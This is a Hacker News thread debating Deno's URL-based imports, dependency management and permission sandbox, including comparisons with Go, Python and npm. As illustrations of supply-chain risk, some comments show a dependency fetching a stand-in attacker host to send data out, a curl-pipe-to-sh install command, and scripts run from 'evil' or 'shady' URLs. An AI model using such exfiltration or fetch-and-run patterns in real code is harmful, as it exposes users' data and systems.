Deno Is a Browser for Code (kitsonkelly.com)
276 points by beefman on May 28, 2020 | 196 comments

Just for kicks, I tried using deno for a task at my day job.

We had a need to extract records from a database into a textual format to be processed by other tools later. This is the typical task for a throwaway script which can be written in basically any scripting language. There is nothing in the task that called out for deno but I wanted to try it out and so I did.

I basically worked on the script iteratively, doing small changes, running it, checking the output, fixing things and running again. No bundler, no complex NPM tasks. Just simple spaghetti JS and a single-binary engine to run it. It was a very refreshing experience. Using URL imports was pretty nice; I really like working like that, since my preferred JS environment is not NodeJS but the browser. I can see myself transitioning all those small tools and throwaway scripts I'd do in NodeJS to Deno.
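The core of that kind of extract-to-text script might boil down to something like this sketch (the record shape, field names and tab delimiter are all made up for the example):

```typescript
// Hypothetical record shape — the real one would come from the database.
interface Row {
  id: number;
  name: string;
  createdAt: string;
}

// Turn rows into the tab-separated text the downstream tools expect.
function toLines(rows: Row[]): string {
  return rows
    .map((r) => [r.id, r.name, r.createdAt].join("\t"))
    .join("\n");
}

// In Deno, any helpers would be pulled straight from URLs at the top of
// the file and cached on first run, e.g. (version illustrative):
//   import { parse } from "https://deno.land/std@0.50.0/flags/mod.ts";
```

No package.json or node_modules: the dependency declaration is the import statement itself.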

People relying on NodeJS for servers and tooling for their client-side webapps might need to wait a bit longer, but for doing small tasks and scripts, I think it is quite ready and better than NodeJS IMHO. These are also good projects to give you a feel for the new runtime.

I've felt exactly that this morning while testing Vite (https://github.com/vitejs/vite), by Evan You, the author of VueJS.

Standard install, nothing to configure, instant hot reload + modern code and tooling yet no perceivable latency for anything.

It felt like suddenly I could enjoy front end dev.

So I get the appeal of Deno.

But I know this ability to put arbitrary URLs as dependencies in the code is going to be terribly misused and abused.

I can see all the tutorials that will start including them, the bad architecture decisions that will spread them across all files, the interns that will use localhost there, the typo and domain squatting or black-hat SEO, the rise of people just telling you to put a URL from their site (the same people that tell you to curl that bash script), the split from npm, the hardship of scanning/mapping/updating dependencies, the mismatch between running and installing biting you, the undebuggable tickets because of proxies/antivirus/firewalls, the cloud hosting potential for failures, some twisted scenario leading to a DoS...

I know it will cause horrible technical debt down the road.

My dev spider-sense is tingling and I'm not going to touch this tech for 5 years, until I either see my prediction unfold or am completely disproved by its success (but I doubt it; I've been really good in the last 10 years at spotting bad technical choices).

There is a reason we have been using separation of concerns since the dawn of time. Declaring dependencies, installing them and importing them are 3 different concerns. They should not mix.

For the importing-from-URLs issue you mentioned, it would be good to ask Golang developers whether they’ve encountered the kind of technical debt you’re concerned about.

I’ve done some Go development, but not enough to really call myself a Go developer so I don’t think I’m qualified to comment one way or the other.

For what it’s worth, I stuck to a policy of only importing from GitHub and forking a repo if I really wanted to be sure it would never disappear. If I were doing it today I’d probably expand my list of acceptable import sources to include GitLab and Bitbucket as well.

I am no expert on Deno. But what other frameworks and browsers are doing is to include a hash in the URL. E.g. https://developer.mozilla.org/en-US/docs/Web/Security/Subres...

Shouldn't Deno force the same behaviour to ensure there is less attack surface through dependencies? I see Deno is taking security seriously.

Sure, this will remove one problem: typo/domain squatting.

All the other ones remain.

I can't wait for Stack Overflow spamming to put the scammer's answer, a legit-looking solution + URL + hash, at the top of Google search results when you type the name of the package.

Before that, you'd install from npm.

But now, any URL is fair game.

I'll get the popcorn.

For small scripts there are many languages out there which are better, with a proper standard library and pre-installed runtimes in virtually every machine.

Why someone would want to use a new language and a new runtime in production scripts is beyond my understanding.

Just write Python for those. Even Perl, awk or sh would be better options, and that is saying something...

This is a bit like saying "why would someone take a ferrari to the corner store, a honda sedan works just fine". The implementation of the task at hand is without consequence, their boss just wants X to happen even if it gets done by hand. I love these opportunities because I can use a language that I'm not getting paid to write for 99% of my day job. Coincidentally this happens to be python for me but I'll defend parent's right to do it in brainfuck if it makes them smile :)

Well, I can think of a few. For one, if you are writing a script with external dependencies, distributing them is more work than with deno.

For python, you would need pip. Can you install any script from arbitrary URLs using pip?

I am not sure but I don't think you can. You also have to declare your deps for pip to figure out.

With deno, it's just `deno run -A <url-to-script>`, since dependencies are declared in the code with their respective URL or file location.

> Can you install any script from arbitrary urls using pip?

You don't need to. Download any module or package, put it next to your code, and you can import it. There is nothing to do. There is no need even for metadata.

But yes, pip can install packages from arbitrary URLs, including git repos, if they contain the right metadata.

What's more, with something like shiv (https://github.com/linkedin/shiv), you can actually bundle those dependencies into one zipapp (an official python feature, see https://docs.python.org/fr/3/library/zipapp.html), which is basically a zip containing your entire project that you can execute as if it were a single .py file.

The whole point of Python is that you don't need external dependencies for "small tasks and scripts".

A production "script" requiring downloads of third-party code from external servers is already a red flag, by the way.

One could extend that logic to argue that all package managers are red flags: after all, you're downloading third-party code from external servers; you just happen to be doing it ahead of time, rather than at runtime.

In principle, there's no reason why the same supply-chain security mitigations npm and other package managers / repositories have put in place could not also be applied in this case: you just apply them at download time, same as before, except now it might result in a runtime error instead of an npm install failure. (No idea if deno does this in its current state, tbh.)

Agree, however, that blindly executing third-party code without somehow vetting it is a security risk.

Also, re: Python - there's a reason why libraries like requests exist; while the Python Standard Library is pretty comprehensive, the APIs it exposes are not always the most intuitive. You might be surprised at how often people pull in helper libraries to work around some of its warts - now, one could argue that maybe they shouldn't do that and should just know the built-in modules better, just as one could argue that functionality is useless unless combined with usability.

Package managers are not red flags, the packages, its vendors and procedures behind those are.

When you download a software update for your kernel you are trusting the Linux Foundation and your upstream vendor. They are supposed to have proper processes in place, they sign the binaries and may even have a support contract with you.

When you put a random URL as a dependency, you are just trusting some random person over the Internet not to screw it up.

Re: Python libraries. The topic of this thread was about "small scripts and tasks". The point of Python and its "batteries included" is that you don’t need external libraries to accomplish common tasks. It is a mistake to use external helper libraries in your scripts (not apps).

You can set up your own mirrors which don't update without audits. Any competent company would do so.

And I wasn't implying that production scripts shouldn't be self contained. Just placing my 2 cents on why.

How is maintaining mirrors of third-party code any easier, reliable, secure or maintainable than just running Python?

Mind you, your Python runtime has been vetted by the Python Foundation, your upstream vendor and your company; is used by many other companies and does not require any network connections to run.

Go is my tool of choice for scripting now. Compiles fast and has an extensive standard library. I've tried using node in the past but all of the async handling turned me off. I prefer go's way of implementing concurrency with go routines.

Go isn’t scripting, it is compiled, which defeats the purpose.

`go run` is quite comparable to `deno run` and in fact inspired a great many of its details. Deno's standard library is literally built as a copy of Go's standard library. They work the same way in many respects, and with Go's type inference and (effectively) duck typed interfaces... If you are familiar with Go it is probably a more suitable scripting environment than most other languages for... scripting tasks.

Why does it being compiled defeat the purpose?

The point of scripts is to easily automate tasks without the need for a heavy infrastructure behind them in the target.

If you have to install/run a pipeline every time you modify them (like C or Rust or Go or TypeScript), or you need to sort out distribution (if you use binaries compiled in another machine), or it takes a long time to compile & run (like Rust or C++), or you need to install a heavy runtime (like a JVM or .NET or v8), it defeats the purpose.

Go can `go run script.go` without more ceremony than that. But there are other tradeoffs:


That compiles and then runs the resulting binary, so you still need the Go infrastructure and the latency.

Go is without doubt a better candidate for scripting than things like Rust or C++, but it cannot compete with the ubiquitous and featureful Python or built-in Unix tools (even more ubiquitous, but less featureful and quite dated).

To be clear, you need the infrastructure the first time you run it. If you run it _more_ than once, it will both start and execute faster than python.

> Go infrastructure

Install go. Just Go.

> latency

Imperceptible.

I've written plenty of bash and python. Go is just better for me, if for no other reason than that the entire SDK is in my head, as is the language.

Python 2 or 3?

Both work.

1) Your distribution vendor most likely supports both and allows you to install both at the same time.

2) Your company probably has a policy for that.

3) Small Python scripts are trivial to make compatible with both major versions.

4) Python 2 is deprecated but supported. Just write Python 3 for new code.

Python 2 reached EOL this year. The short answer should just be "Python 3" by now.

whichever one is on your computer

Sounds like that directly invalidates the use case of small portable scripts.

not really. it's perfectly easy to write scripts that work with py2 and 3

It's very interesting to me, the level of skepticism that is being shown towards Deno.

Whether or not you agree with the approach, you have to agree with the underlying problems that Deno is trying to solve. Furthermore I agree with the article in that there is a paradigm shift here, which should be given a chance.

I for one am happy about the url imports for a variety of reasons, but top on my list is that it will (in theory) reduce the total amount of code people are using from other sources, and (in theory) will make developers more aware of what they do choose to import. All of this should reduce bloat and reward open source maintainers that solve novel problems in a clear & concise way.

There are better ways to reduce bloat. Gitlab can do web asset analysis and throw warning signs when your JS file goes over a certain size. Of course, in server-side applications the use-case would be different, but the idea remains the same: do not depend on developers doing the right thing every single day, depend on an automated system if something like this is crucial to you.
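The automated gate described there can be tiny. A sketch (the 250 kB budget and the `dist/bundle.js` path in the comment are invented for illustration):

```typescript
// Size budget for a built JS asset, in bytes — a made-up number; tune per project.
const LIMIT_BYTES = 250_000;

// True when an asset of the given size is within budget; a CI stage
// would fail the pipeline when this returns false.
function withinBudget(sizeBytes: number, limit: number = LIMIT_BYTES): boolean {
  return sizeBytes <= limit;
}

// A CI stage would wire it up roughly like:
//   import { statSync } from "node:fs";
//   if (!withinBudget(statSync("dist/bundle.js").size)) process.exit(1);
```

The point is exactly the one made above: the check runs on every build, regardless of whether any individual developer remembered to care that day.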

The URL import completely throws away all the goodies that great package managers have. Being able to manage sub-dependency versions is a big one. I do not understand how people are OK with throwing those away. Either they have never encountered issues that stem from dependencies or they just don't care.

Deno could technically add layers on top that make dependency management easier, but then we are back to NPM.

I recently did a bunch of nodejs work.

Ryan Dahl is the biggest reason I'm interested in deno. His post-mortem for nodejs is spot on. He's intellectually honest and learns from experience. If he were a starship captain (Sisko), I'd follow him into a black hole.

I felt the same way about Redis. But then I read antirez's writings and saw his source code. Redis is exactly what it says it is. And I love that.

PS- Took me forever to realize "deno" is an anagram of "node".

> Whether or not you agree with the approach, you have to agree with the underlying problems that Deno is trying to solve.

Perhaps, but that does not mean Deno is the solution.

> there is a paradigm shift here, which should be given a chance.

Why? If I come up with a novel approach for something, I am the one that has to show it works.

> I for one am happy about the url imports for a variety of reasons, but top on my list is that it will (in theory) reduce the total amount of code people are using from other sources

I'd say it is the other way around. It encourages an even crazier approach to dependencies than the NPM mess already is.

It's very interesting to me the level of enthusiasm being shown towards Deno. It is clearly being embraced more than it has shown its worth.

The key paragraph:

> The Deno CLI works like a browser, but for code. You import a URL in the code and Deno will go and fetch that code and cache it locally, just like a browser. Also, like a browser, your code runs in a sandbox, which has zero trust of the code you are running, irrespective of the source. You, the person invoking the code, get to tell that code what it can and can’t do, externally. Also, like a browser, code can ask you permission to do things, which you can choose to grant or deny.

The big problem with Deno is that permissions, once granted, apply to every imported URL. You cannot ask it to let one script access the file system, another access network and the rest of them run fully sandboxed. This makes it so that you either only import scripts you already fully trust (making the permission system useless) or don't allow any access (making the ecosystem useless).

To keep with the browser comparison: browsers have started to add tracking protection, and people are installing adblockers, because we've basically concluded that we don't want the websites we load to call out to arbitrary other websites, even if we do want them to call out to some.

That said, sounds like it's something they're thinking about:

> It is also hard to break down those permissions, to say “this code can do this, but this other code over here can’t” or when code prompts to escalate privileges where is that code coming from. Hopefully we can figure out an easy to use mechanism coupled with something that would be effective and performant at runtime to try to solve those challenges.

Except it's not a browser, which never has file access, db access etc.... A MITM download in the browser affects a few users. A MITM download in Deno affects all users.

Let me tell you about IndexedDB and the File System API :)

Jokes aside, though, doesn't the MITM only affect users who run the MITM'd script, just like in the browser it only affects users who visit a MITM'd site?

... Just like every other software dependency system ever.

Would you please clarify what you are talking about? You grant permissions on a script by script basis. Your statement looks to me like the exact opposite of reality. What have I misunderstood?

I think you and the parent are working under different definitions of "script".

Deno allows you to grant permissions per top-level invocation. So if you have one program that you run by typing `deno run passwordmanager.js` at the console, and another program that you run by typing `deno run downloadfiles.js`, you can give different permissions to each of those "scripts".

But within one program, you can't (easily) give different permissions to different dependencies. If downloadfiles.js imports both http.js and check-if-number-is-even.js, and it wants http.js to be able to access the network, it has to request the access-the-network permission globally. So check-if-number-is-even.js would also be able to access the network. The different "script" files that make up one program all have to have the same permissions.
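To make that concrete, here is a sketch of what such a trivial dependency might look like (the module name comes from the example above; the fetch in the comment is hypothetical):

```typescript
// check-if-number-is-even.ts — a trivial dependency. Under Deno's current
// model it inherits whatever permissions the top-level `deno run`
// invocation was granted, even though it needs none of them.
export function isEven(n: number): boolean {
  // Nothing in the permission model stops this module from also doing
  //   fetch("https://evil.example/collect?data=...")
  // when the program was started with --allow-net for http.js's sake.
  return n % 2 === 0;
}
```

A per-module capability model would let this file be imported with zero privileges while http.js alone keeps network access.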

(Sure, Deno might have other ways to sandbox parts of your program, but so does Node -- Deno's permissions improvements don't really help you in that case.)

As someone unfamiliar with the ecosystem as a whole, is this not an issue similar to any sort of library that you run “in process”? Like, if you’re writing a mobile app and you manage to obtain location access, the Facebook SDK that you link against gets the same thing too?

Yes this is the common way computers work, but there's no reason to accept it. When today's process model was designed, there was no such thing as github or the internet. The idea of googling for a hunk of code and just pasting it into your app was ... not a thing on anyone's mind.

You might argue people are wrong to do that, but the fact is it's extremely popular. And if we redesign the security model, we can allow people to do it safely.

Imagine if leftpad.js had no privileges to anything, even if included in an application that has privileges to network, disk, etc.

The fact that something is popular in webdev does not make it right nor popular outside webdev.

In almost any other CS field you would be crazy to use non-vetted third-party code and depend on external service providers for your code to simply run.

I can only think of draconian DRM, which puts things in perspective...

It's popular everywhere. The Go ecosystem, or Rust ecosystem, as an example is just as bad about this as the JS ecosystem. There is a difference, but it's a constant factor. Asymptotically, everyone is just pasting code they found on the internet into their app. Crazy, but true.

That's why a per-library sandbox model seems so beneficial.

Loading classes over the network and running them in a configurable sandbox is what originally excited me about Java, but exploits were found and it's hardly ever used now.

I mean there will definitely be exploits.

It does still seem dramatically different to need to get an escape out of the js sandbox than to just be handed privileges by design.

Particularly if (in some glorious future) the js vm is written in a safe language, not C++.

The thing with the web is that vetting dependencies is (for the most part) very uncommon.

Some people are realizing it is not a good idea to download random code. So the solution proposed by Deno is to sandbox it and put a capabilities system into it, rather than create a culture of proper dependency management.

At least they are trying...

But since there is a VM anyway, it is fair to expect library sandboxing.

Could the solution just be to audit the permissions your dependencies require? Sure, it gets murkier with transitive deps like your http.js and number-is-even.js example, but I would argue that this scenario isn’t as dangerous as it seems because it adds an opportunity for the middle-man-dependency (http.js) to catch overreaching permissions.

With node, it is very opaque. With deno, as I see it, http.js can easily check the permissions for number-is-even.js, and you can easily check the permissions of http.js. It’s not perfect, but I think each link in the dependency chain is at least more easily auditable, even if it is not strictly more secure.

In my experience, auditable doesn't really matter. To have peace of mind you really need to be able to enforce that number-is-even.js will never do a http request.

I would seek to automate this audit and enforce it with a commit hook or CI stage or something

Doesn't solve the problem, but you can at least provide a whitelist of domains and filesystem paths.

For example, if you only whitelisted --allow-net=api.example.com, it would be a lot more annoying for a rogue dependency to exfiltrate data.

> ask it to let one script access the file system, another access network and the rest of them run fully sandboxed.

this is actually quite a difficult problem to solve. You're balancing the security needs with usability.

Browsers have an advantage on this aspect, because they can make the assumption that the webpage does not require filesystem access.

i think fully sandboxed OS-esque security model is the only way this can work. Like on android, where each app sees only their own filesystem, and app-to-app interaction is done via a permission based system that the user has to approve.

On android, apps have access to shared folders. For example my music player can scan and read files under /mnt/sdcard/Android/data/com.dropbox.android/files/

It may be more isolated if it follows the Nix file system model?

They could have maybe looked at E for some inspiration on how to solve the problem http://erights.org/

    const status = await Deno.permissions.revoke({ name: "run" });
    assert(status.state !== "granted");

    // a static import would be hoisted above the revoke, so import dynamically:
    await import("https://shady-site.com/this-file-cannot-run-processes.ts");

Though after that point even your own code cannot use that permission anymore.

It would be amazing if it had scoped permissions.

I think Ryan is aware of this, as it has been raised on some occasions already, but it might be too complicated or costly in dev time to have before a new version bump.

To the people who are skeptical of Deno, I would urge you to have patience and try it out. Deno is a young tool and it will take time to develop the features that you take for granted in other systems. But Deno gets a lot of things right. I already love using it day to day.

I remember using Node when it was this age and thinking it was the future, too. And it was. But as with Deno now, there were problems. In fact, Node was far worse in many ways. npm was extremely unstable back then, for example, which often made it impossible to use. Deno doesn't have that problem. Node had to create libraries from scratch and invent a ton of non-standard things along the way to do it. Deno is built on web standards but can also leverage many of the existing Node libraries by using std/node (the Node compatibility layer) or with jspm.io, for example. Yes, there's the occasional quirk or missing library, but it's already easy to be productive with Deno and it's a lot of fun.

> Node had to create libraries from scratch and invent a ton of non-standard things along the way to do it. Deno is built on web standards but can also leverage many of the existing Node libraries by using std/node (the Node compatibility layer) or with jspm.io, for example

Node.js is based on CommonJS [1] which defines the require() semantics for CommonJS/node.js modules as well as core libs/APIs such as JSGI (for express.js or node core http middleware) and others. When node.js was new, there were many JavaScript app server projects such as helma, v8cgi/TeaJS, and others, and CommonJS was very much a community effort.

[1]: http://wiki.commonjs.org/wiki/CommonJS

The inability to import (require) modules using relative paths drove me nuts while using nodejs. I hope deno fixes that.

I think this is a good article, and worth the time to give it a read. When Deno was first announced I was not sold on this aspect of the system.

Over time though, and after having written a barely-above-trivial app in Deno, I've started to come to the conclusion that Deno's form of dependency management is a fresh perspective which ties closer to how browsers work and is a welcome simplification. The article covers a few ways that you can get production/reproducible builds out of the box, which is usually people's first worry.


Odd that the article doesn’t mention Go. Deno works like Go. It’s slightly different in that Go added a system for version rewrites recently (“modules”), but other than that it’s the same, and if importmaps ever happen, it will be the exact same.

Also Deno has a command line fallback for its version of GOPATH, which is smart because it turns out a huge percentage of devs don’t know what env vars are or how to set them.

But other than cosmetic differences, it’s pretty much identical to Go.

> GOPATH, which is smart because it turns out a huge percentage of devs don’t know what env vars are or how to set them.

This gave me a laugh but it’s not fair! I’d guess most of the GOPATH outcry was the annoyance around managing automated and other non-dev environments.

Also at having to put your source in the gopath at its import path. So you couldn't have 'project/' and 'project2/', you had to have 'gopath1/src/path/to/project/' and 'gopath2/src/path/to/project2' or you had absolutely no isolation between things (until vendor (and that leaks (and it still requires that deep folder structure in some cases (and it took them quite a while to accept it in core tools)))).

GOPATH was nothing short of a monstrosity. Its problems were truly obvious on day 1, but it lingered and infected everything.

I don’t agree that it was a monstrosity. I do agree that developers didn’t like having to include “extra” folders. I think even just making a GOSRC var and dropping /src would have bought good will. (Go has a GOBIN.)

I still use this directory structure and it doesn't really bother me honestly. Makes it very easy to work with multiple local repositories without having to worry about any linking or installing bullshit you have to do with other systems.

It is certainly remarkable how long this stays effective in Golang. Libs just don't break.

Are you sure you aren't discussing lisp here? :)

There is a subtle but significant difference between the approaches of Deno and Go.

Deno directly uses standard URIs to import packages. Go imports syntactically appear as schemeless paths, which boils down to the semantics of importing URIs from an implicit private go:// scheme.

And that catches two fishes at once:

1) The go:// namespace is isomorphic to the https:// namespace, so the default resolution strategy is just to pipe through this isomorphism. This is convenient, makes sense right away and avoids any a priori need for a central registry.

2) Whenever it's needed, the resolution can be instructed to do some custom thing instead of casting to https://.

The exemplar instance of 2) is the usage of sibling packages. They wanted to make it possible to have several packages within a single module, whereby the module serves as a compilation unit. So when an import path is a subpath of the module path, then the package is looked up locally, relative from the root of the current module. There is no way you could get away with such a bending of a https:// URI. But go:// being a private scheme gives the freedom to proceed so.

(The go:// scheme is just my own literary device, but this semantics is explained clearly in simple terms at https://golang.org/doc/code.html.)

I've been skimming the arguments so I might have missed something big, but isn't the key distinction that Deno can take anything from a URL? Go's "go get" is backed by version control systems, but you could freely point your deno at "http://dangerous.com/evil.ts". I thought the concern was about the potentially problematic flexibility.

Isn't that the advantage though, that you can do exactly that without concern?

> deno run --allow-write=~/only-evil-here http://dangerous.com/evil.ts

Go has a system for telling where to fetch based on the URL response. You can basically send anything if you are evil, but Go modules keep a hash of seen content (what Deno calls a lockfile), so you’d notice that it changed.

Importmaps are available in deno behind an unstable flag. A few npm clones are using them.

You hardcode the dependency version in the actual URL string in JavaScript code? How in the world is that manageable? I run `npm update` once a week and it brings down a dozen or so updates (occasionally `npm outdated` as well with manual testing).

I bet we'll have a bunch of competing standards for "dependency management" in deno coming online really soon, because there's an obvious need for that.

Also, are dynamic dependencies a thing? Can I run some code to decide (at runtime) whether I import this.package or that.package? Holy hell... with test coverage the way it is in most projects, that's going to blow up really fast.

>I run `npm update` once a week and it brings down a dozen or so updates

That's my worst nightmare. This kind of thing always results in my having to spend hours figuring out which of the new updates broke everything and what do I have to do to fix it.

Once I have something working, I don't want updates to ever be installed unless I know 100% for sure that it is only fixing a security issue.

I never had that issue. But I often had issues with native extensions; a few years ago it happened often enough that I would favor a JS-only package if I could find an alternative. I also avoid webpack because that always did break with updates; maybe it is more stable now? Regardless, dependency management is hard. Every time I would do some c++ I would waste a lot of time just trying to get things to compile. The worst experience for me has been with iOS apps: I would make an app, not touch it for a while, and then have to update the iOS version, which required a new Xcode version, which required a new Mac version, and then Swift's API would have changed and things wouldn't work. Dreadful. I guess my takeaway is that software rots fast.

You can use automated testing to verify if your functionality is still there.

If that's too much work you can just deploy to a subset of your users (after npm audit) and let the error monitoring system tell you about the new exceptions.

I think it works fairly well for the use case of a scripting runtime instead of an application runtime. Consider a common command such as:

> curl -fsSL https://myapp.io/install.sh | sh

That's pretty scary. It might do anything to user data. The deno sandbox would offer more assurances, of course:

> deno run --allow-write=~/.myapp https://myapp.io/install.sh

You know it would only access what you expect. Same with another command:

> deno run --allow-read=./my-data.csv https://data-app-thing.io/visualize-data.ts my-data.csv

It's as described, a browser, not a server platform.

Please don’t compare Deno to NPM. This is all I see anytime Deno is mentioned, and often in some form of severe defensiveness.

If you need a million packages to write a tiny application Deno may not be your cup of tea. The entire article is about readjusting your expectations away from that kind of incompetence towards an alternative approach.

It's not incompetence; there's quite literally no other real solution. The sprawl of the npm ecosystem is a result of there being (essentially) no standard library in JavaScript and an intentionally small one in Node.js. As a result, simple problems have to be solved in userspace.

Your application can intentionally choose only to depend on a small number of libraries, but of course those libraries will need to consume other libraries, and so on, and you rapidly end up with hundreds of dependencies in node_modules.

If we wanted to solve this, we could introduce a comprehensive standard library. However, we'd need it to be bundled with every existing browser (and Node.js), which is likely why it hasn't happened.

The lack of a standard library is definitely a major factor, and the way npm solves the Diamond Dependency Problem exacerbates the issue by an order of magnitude. Not only is everyone pulling in dozens of packages that do simple things, you also end up pulling in dozens of versions of each of those packages because package developers aren't forced to flatten their dependency trees. And since no one is forced to do this, using something like 'yarn install --flat' yourself is a huge pain.

If we had a proper standard library and a sane package manager with flat dependency resolution by default, bundling just the parts of the standard library we need for the web would be easy (browserify has existed for a long time).

> The sprawl of the npm ecosystem is a result of there being (essentially) no standard library

You finish that statement with a phrase completely at odds with this part about no standard library. After having written applications using Node for a decade now, I have learned that the real problem is developers not wanting to write or own original code. No standard library will be comprehensive enough to fix that.

> You hardcode the dependency version in the actual URL

Websites have been doing this for .. 20 years?

It's quite a different paradigm, yes.

Before the age of React, when I used to work on decent-sized web sites' frontends, there would typically be maybe a handful of external dependencies; usually just jquery, and later on perhaps a few other powered-by-jquery utilities that give you a carousel or other UI elements. Most of the rest of the JS code was written in-house.

Working with node backend in the past few years, most of my backend services typically list a dozen dependencies or so in package.json, and those in turn have a bunch of other dependencies of their own. Among these there's probably lodash, some schema validator (ajv/joi/etc.), maybe an xml parsing/building lib, some unit testing framework, db query builder, and so on.

I'm not saying this to be pro-node and attack deno or anything; I just feel like the statement of "websites/browsers have been doing this forever" isn't exactly an apples to apples comparison.

Websites have been doing this for .. 20 years?

Web developers have been trying to move away from that paradigm in order to make sites faster, more reliable, and smaller for almost as long.

Web developers have been trying to move away from URLs that describe their content for 20 years?

Well that certainly explains the state of the 'modern' web

Web developers have been trying to move away from URLs that describe their content for 20 years?

My comment wasn't about URLs describing their content, but rather the assumption that goes along with it that every network request will always work perfectly. Once you realise that things do actually fail occasionally, you should realise that local caches and bundling things into a smaller number of requests can improve resilience.

That's not really an issue with Deno because it does things to mitigate the issue (eg caching packages locally), but websites that loaded libraries using separate requests for each one were horribly prone to failure if one thing was missing, and slower overall if the browser couldn't fetch everything in parallel, so devs invented things like bundlers to fix the problem. Then came things like code-splitting and tree-shaking to reduce the size.

A major difference: transitive dependencies. In the old days, jquery.foo.bar.js would say “make sure you’ve loaded jquery.js and jquery.foo.js first”, and it would be up to you to decide which versions of them to use. Under Deno, modules will declare their exact dependencies and I suppose you the caller can’t control them. Or else they could devolve into some form of dependency injection.

This could lead to many copies of a library being loaded and included, rather than just one via deduplication as other packaging systems tend to do.

(The article talks about the potential need to remap dependencies, which could allow you to resolve this sort of duplication manually, but says that the current implementation should probably be avoided.)

You could, for example, just import * from 'unpkg.com/react', which handles updating automatically since it always resolves to the latest version. You could just as well put a modifier on the URL to specify that you only want minor updates, etc...

There are already more than a few.

Personally I am a big fan of https://github.com/hayd/deno-udd

GitHub will probably add dependency management for it. It already hosts most of the packages, I guess.

If they wanted to fix something in dependency management, they could have started by adding a way to sign code/packages. Indeed, browsers don't allow signing pages, which means anyone from the hosting provider to the CDN to the MITM corporate proxy can inject any code they want. It sucks, and I'm not sure why "Deno is a browser for code" is supposed to be a good thing....

Hopefully something like Google's Signed HTTP Exchanges will fix that in the future, for browsers at least.

While not exactly what you are asking, SRI does address that issue to a certain extent


Does SRI allow signatures? I want to have a policy where any script signed by my Ed25519 key is valid, I don't want to have to hardcode the hash everywhere.

It doesn't, it's only for verifying that the thing is what it was when hashed and not who it's from. The funniest part of this discussion to me is that we're now discussing features of a, say it with me, a package manager! Only now we get to add them by hand.

To be honest, I am not sure what should be wrong with adding code by hand.

Libraries were added manually by legions of developers long before anyone thought they'd need to create a downloadable left-pad "package".

The whole package management issue is overrated.

It does not, hence "not exactly", but SRI is still a nice add-on.

Yes, the only missing thing is the page you initially download, which contains all the hashes :)

Well, jQuery has the hashes on-site.

Unless I'm missing what you're referring to, that's not true at all - HTTPS is secure and uses certificates to sign and encrypt traffic.

I think OP is arguing:

- Host can change what is in a package at any time. In case Deno calculates a hash on your machine (e.g. package-lock.json), it's not as bad, but still without a signed package you can't be sure that it was the author that released the code in the first place.

- Host <-> CDN usually happens over HTTP. Often it is the CDN where HTTPS is terminated. Technically the CDN can deliver whatever code to you.

- Corporate HTTPS proxies exist. With a proxy like this, it can also replace the code with whatever it likes.

> In case Deno calculates a hash on your machine (e.g. package-lock.json), it's not as bad, but still without a signed package you can't be sure that it was the author that released the code in the first place.

If you trust that the URL is in a (sub)domain controlled by the author and it's an HTTPS URL, that's as much guarantee as a signature.

HTTPS tells me that I am definitely downloading this package from GitHub. But what exactly am I downloading from GitHub? No clue.

I think they are referring to signed content, not signed transport. That is, this blob of content/code I downloaded is signed, and I have more trust in it than in some other piece of content/code that's from a server meant to house hundreds or thousands of different people, much less modules.

You can trust that the developer meant to release that, and it's not some hack of the system, and you can also require that the code comes from a vetting third party that reviews all modules and updates and signs it itself (i.e. what Linux distro package managers do).

The two most frequent arguments against using URLs instead of npm packages seem to be: 1) Security: What if someone changes the code behind a URL? 2) Hard-coded versions in application code

I don't think these arguments are valid. For 1) you can always limit the URLs you use to hosts like jsDelivr or unpkg and reference npm packages directly. In this case instead of trusting only npm to send you the code you requested, you're now trusting the CDN as well. Potentially even better could be to import scripts from Github directly. For 2) a simple solution could be to have a deps.ts file for your project where you import from single-version URLs and export the dependency version-unaware. Now your versions are not scattered throughout your application code.

To me URLs seem like a nice (because compact and universal) interface for dependencies which allows decoupling your package management from your runtime.
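
The deps.ts pattern from 2) might look like this (the URL and version shown are illustrative, not a recommendation):

```typescript
// deps.ts — the single place where versioned URLs live.
// Version pinned here once; application code never sees it.
export { serve } from "https://deno.land/std@0.50.0/http/server.ts";

// elsewhere in the app, imports are version-unaware:
// import { serve } from "./deps.ts";
```

Bumping a dependency then means editing one line in one file, which is roughly what a lockfile gives you in npm, minus the tooling.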

So, in order to solve 1) and 2), we should return to what every other language does? That sounds like a design mistake...

What do you mean by "URLs are compact"? How can a URL be compact compared to the same URL in some sort of dependencies file? Unless you use the dependency once, of course, which is rare.

URLs and explicit versions in the import also encourage you to use several versions of the same dependency in your code, which is a very bad idea.

NPM’s model of referencing packages from central repositories is bad for many reasons proven over the years. But referencing GitHub scripts and arbitrary URLs is even worse.

URLs are compact as in a single string they specify everything you need to locate and use the dependency and you don't need any context, like a specific dependency manager (incl some sort of dependency file). I guess I mean compact as in self-contained, not necessarily short.

That's fair, and I'd agree it could be a useful property for scripts and even small apps if all code was trusted and all networks had perfect availability.

Sadly, that is not the case, which is why I don’t see the advantage of going "the browser way" for local scripts.

The first time I dealt with dependencies written directly in code was with Groovy.

It wasn't a good idea back then, it wasn't a good idea in Go, and it definitely isn't a good idea in Deno.

Care to explain why?

Because it ties the source code to the origin of the dependencies, forces code rewrites that don't scale across all dependencies, and isn't enterprise-friendly for using internal IT-vetted repositories.

Just because a dependency changed location I should not be obliged to touch a single character of the source code.

In the case of Groovy that OP mentioned, that's wrong. This is what it looks like in Groovy[1]:

    @Grab(group='org.springframework', module='spring-orm', version='3.2.5.RELEASE')
    import org.springframework.jdbc.core.JdbcTemplate

This provides the dependency's coordinates... but not where it comes from.

You can define where it comes from by configuring repositories (normally done by modifying the M2 settings file). This is how Java has always done it in Maven and Gradle, even Ant a long time ago. And this works really well! I've never seen anyone complain about how that works.

[1] http://docs.groovy-lang.org/latest/html/documentation/grape....

I am the OP and you forgot this little detail,

    @GrabResolver(name='restlet', root='http://maven.restlet.org/')

No I didn't. This is if you WANT TO use a particular repo. Read the docs and you'll understand that.

Which breaks the script when that repo is no longer available.

The holy grail of package management is absence of packages and versions, but distribution via signature-addressable code.

In the end it’s all just functions that take arguments and return values. They should be the minimal unit of distribution. Potentially even with precompiled bytecode signed by some trusted compilation provider.

It's always fun to solve half of a problem perfectly and ignore the other half. But then you wonder why it doesn't take the world by storm. (Or sometimes it does, if you were pushy enough, and everyone has to live with your half-solution.)

The problem is not only about units of distribution, but also about units of interoperability. The unit should be a group of functions that share common types, naming conventions and design decisions, and have no weird edge cases when used together, unlike some mishmash cobbled together from the internet. In other words, a library. It's like Coase's "Nature of the firm": libraries exist to lower interoperability costs internally, same as firms exist to lower transaction costs internally.

